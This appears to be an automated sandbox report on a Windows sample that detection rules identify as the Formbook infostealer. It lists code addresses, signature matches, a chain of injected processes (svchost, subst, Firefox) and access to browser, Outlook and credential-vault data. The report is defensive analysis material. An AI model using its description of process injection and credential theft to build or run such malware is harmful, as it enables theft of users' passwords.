            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B499501_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B9501_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B438E01_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAD8001_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFFB11_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B41F921_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFF091_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B49EB01_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FDC01_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7D731_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF1D5A1_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B43D401_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFCF21_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB9C321_2_03BB9C32
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CA352
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0311E3F0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031D03E6
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031B0274
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031902C0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031AA118
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03100100
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03198158
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031D01AA
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C41A2
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C81CC
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031A2000
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03134750
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03110770
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0310C7C0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0312C6E0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03110535
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031D0591
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031B4420
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C2446
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031BE4F6
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CAB40
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C6BD7
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0310EA80
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03126962
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031129A0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031DA9A6
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0311A840
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03112840
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_030F68B8
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0313E8F0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03130F30
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031B2F30
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03152F28
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03184F40
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0318EFA0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03102FC8
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CEE26
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03110E59
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03122E90
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CCE93
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CEEDB
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031ACD1F
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0311AD00
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03128DBF
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0310ADE0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03110C00
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031B0CB5
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03100CF2
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C132D
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_030FD34C
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0315739A
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031152A0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0312B2C0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0312D2F0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031B12ED
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031DB16B
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0314516C
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_030FF172
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0311B1B0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031170C0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031BF0CC
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C70E9
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CF0E0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CF7B0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03155630
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C16CC
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C7571
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031AD5B0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031D95C3
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CF43F
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03101460
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CFB76
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0312FB80
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03185BF0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0314DBF9
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CFA49
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C7A46
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03183A6C
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03155AA0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031ADAAC
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031B1AA3
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031BDAC6
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031A5910
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03119950
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0312B950
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0317D800
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031138E0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CFF09
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03111F92
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CFFB1
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_030D3FD5
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_030D3FD2
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03119EB0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C1D5A
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03113D40
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031C7D73
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0312FDC0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03189C32
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031CFCF2
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_008417D0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0085A1E0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0083C9A0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0083CBC0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0083AC40
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_0084330E
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_00843310
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_02E6B158
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_02E6BC38
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_02E6BD53
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87E54 appears 105 times
Source: C:\Windows\SysWOW64\subst.exe Code function: String function: 03157E54 appears 107 times
Source: C:\Windows\SysWOW64\subst.exe Code function: String function: 0317EA12 appears 86 times
Source: C:\Windows\SysWOW64\subst.exe Code function: String function: 0318F290 appears 103 times
Source: C:\Windows\SysWOW64\subst.exe Code function: String function: 030FB970 appears 262 times
Source: C:\Windows\SysWOW64\subst.exe Code function: String function: 03145130 appears 58 times
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: String function: 001C0D27 appears 70 times
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: String function: 001A7F41 appears 35 times
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: String function: 001C8B40 appears 42 times
Source: 7RsDGpyOQk.exe, 00000000.00000003.1699446099.0000000003653000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7RsDGpyOQk.exe
Source: 7RsDGpyOQk.exe, 00000000.00000003.1699972884.00000000037FD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7RsDGpyOQk.exe
Source: 7RsDGpyOQk.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/13
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: 0_2_0020A2D5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: 0_2_001F8713 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: 0_2_001F8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: 0_2_0020B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: 0_2_0021F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: 0_2_0020C602 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Code function: 0_2_001A4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe File created: C:\Users\user\AppData\Local\Temp\autE71E.tmp
Source: 7RsDGpyOQk.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: subst.exe, 00000004.00000003.2145243549.0000000002D03000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.2145132781.0000000002CE3000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4162582023.0000000002D03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7RsDGpyOQk.exe ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Users\user\Desktop\7RsDGpyOQk.exe "C:\Users\user\Desktop\7RsDGpyOQk.exe"
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\7RsDGpyOQk.exe"
Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe Process created: C:\Windows\SysWOW64\subst.exe "C:\Windows\SysWOW64\subst.exe"
Source: C:\Windows\SysWOW64\subst.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\7RsDGpyOQk.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\subst.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\subst.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\subst.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: 7RsDGpyOQk.exe Static file information: File size 1230848 > 1048576
Source: 7RsDGpyOQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 7RsDGpyOQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 7RsDGpyOQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 7RsDGpyOQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 7RsDGpyOQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 7RsDGpyOQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 7RsDGpyOQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: subst.pdb source: svchost.exe, 00000001.00000002.1968176241.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968158408.0000000003400000.00000004.00000020.00020000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162803176.0000000001468000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: subst.pdbGCTL source: svchost.exe, 00000001.00000002.1968176241.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968158408.0000000003400000.00000004.00000020.00020000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162803176.0000000001468000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJCHZIamnVz.exe, 00000003.00000000.1891445097.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035492921.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 7RsDGpyOQk.exe, 00000000.00000003.1700648692.0000000003580000.00000004.00001000.00020000.00000000.sdmp, 7RsDGpyOQk.exe, 00000000.00000003.1701137801.0000000003720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1872671742.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1874644397.0000000003900000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.000000000326E000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1970410366.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1968115517.0000000002D71000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 7RsDGpyOQk.exe, 00000000.00000003.1700648692.0000000003580000.00000004.00001000.00020000.00000000.sdmp, 7RsDGpyOQk.exe, 00000000.00000003.1701137801.0000000003720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1872671742.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1874644397.0000000003900000.00000004.00000020.00020000.00000000.sdmp, subst.exe, subst.exe, 00000004.00000002.4163447756.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.000000000326E000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1970410366.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1968115517.0000000002D71000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.00000000036FC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2036102940.000000000324C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B4DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.00000000036FC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2036102940.000000000324C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B4DC000.00000004.80000000.00040000.00000000.sdmp
            Source: 7RsDGpyOQk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 7RsDGpyOQk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 7RsDGpyOQk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 7RsDGpyOQk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 7RsDGpyOQk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0021C304 LoadLibraryA,GetProcAddress, | 0_2_0021C304
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001AC590 push eax; retn 001Ah | 0_2_001AC599
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00208719 push FFFFFF8Bh; iretd | 0_2_0020871B
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CE94F push edi; ret | 0_2_001CE951
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CEA68 push esi; ret | 0_2_001CEA6A
